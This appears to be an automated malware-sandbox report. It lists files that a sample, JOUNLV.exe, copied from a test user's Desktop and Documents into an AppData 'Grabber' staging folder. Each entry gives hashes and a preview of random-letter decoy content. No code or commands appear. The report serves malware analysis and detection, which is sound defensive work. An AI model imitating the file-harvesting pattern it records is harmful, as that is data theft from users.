                                                                                                                                                                                                                                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                                                                                                                                                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW\YPSIACHYXW.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZBEDCJPBEY.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\CURQNKVOIX.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688505748329201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                                                                                                                                                                          MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                                                                                                                                                                          SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                                                                                                                                                                          SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                                                                                                                                                                          SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\JSDNGYCOWY.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\JSDNGYCOWY.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\NIKHQAIQAU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\RAYHIWGKDI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                                                                                                                                                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                                                                                                                                                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
